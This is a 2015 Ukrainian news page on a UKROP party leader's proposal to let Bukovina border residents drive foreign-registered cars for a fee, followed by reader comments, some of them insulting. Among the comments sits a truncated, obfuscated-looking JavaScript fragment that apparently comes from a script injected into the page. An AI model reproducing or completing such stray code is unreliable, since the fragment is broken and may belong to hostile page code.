«Українці повинні їздити на «Мерседесах», а не на російських ВАЗах», - голова Буковинського УКРОПу Віталій Ткачук

«Українці повинні їздити на «Мерседесах», а не на російських ВАЗах», - голова Буковинського УКРОПу Віталій Ткачук

29.09.2015, 11:41

УКРОП пропонує запровадити вільне пересування автомобілів з іноземною реєстрацією протягом року в рамках проекту про малий прикордонний рух. На переконання голови Чернівецької обласної організації «Українського об’єднання патріотів – УКРОП» Віталія Ткачука, це допоможе залучити суттєві кошти для будівництва доріг і створити комфорт нашим землякам.

«Набір митних поборів, який зараз діє в Україні, відбиває у громадян потребу мріяти, - вважає Віталій Ткачук. - Вони зроблені нібито в інтересах вітчизняного виробника, утім доки якість українських автівок залишається «неєвропейською», накручувати суми – це просто змушувати українців постійно вигадувати схеми в'їзду і виїзду за кордон». Натомість він пропонує змінити ці умови, принаймні для мешканців прикордонних територій. «Буковинці, які отримали карту про малий прикордонний рух, повинні отримати можливість за якусь невелику плату (3000-5000 грн.) без проблем пересуватися рік на автомобілі з іноземною реєстрацією», - переконаний лідер Чернівецького УКРОПу.  

Джерело: http://www.ukrop.com.ua/

1


КОМЕНТАРІ (4)

Бред сивой кобылы.Теачук укроп играет на больных вопросах нашего общества!Контрактная армия дешёвые машины и тд!Он лично что сделал для Черновцов ровно 0 и поверте он ничего и не будет делать!Он и его папка регионал могут только одно делать!ВОРОВАТЬ!а ещё забыл петь в караоке и то на 2бала!Пой Ленин пой!

avatar

Саня

29 вересня 2015 09:12

Все вірно!!! Мито потрібно ліквідовувати! 

так, це хворі теми, чому влада їх не виліковує? Бажаємо УКРОПу перемоги! Чекаємо змін на краще!

avatar

Микола

29 вересня 2015 09:37

А це, що за дебіли репають???

avatar

віктор

29 вересня 2015 14:28

Це все добре, та це не в компетенції Ткачука..... я розумію, що він перед виборами обіцяє, аж очі вилазять, та обіцяти те, чого він в принципі НЕ ЗМОЖЕ ЗРОБИТИ.... тупо. І перепрошую, що саме допоможе долучити чуттєві кошти для будівництва доріг? Хто буде платити ту невелику сумму, якщо і так кордон можна пересікати раз в рік.... для цього ж достатньо тільки одного: щоб на вашому автомобілі з європейськими номерами в'їхав та виїхав іноземець. 

// t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e

avatar

Віолетта

29 вересня 2015 14:54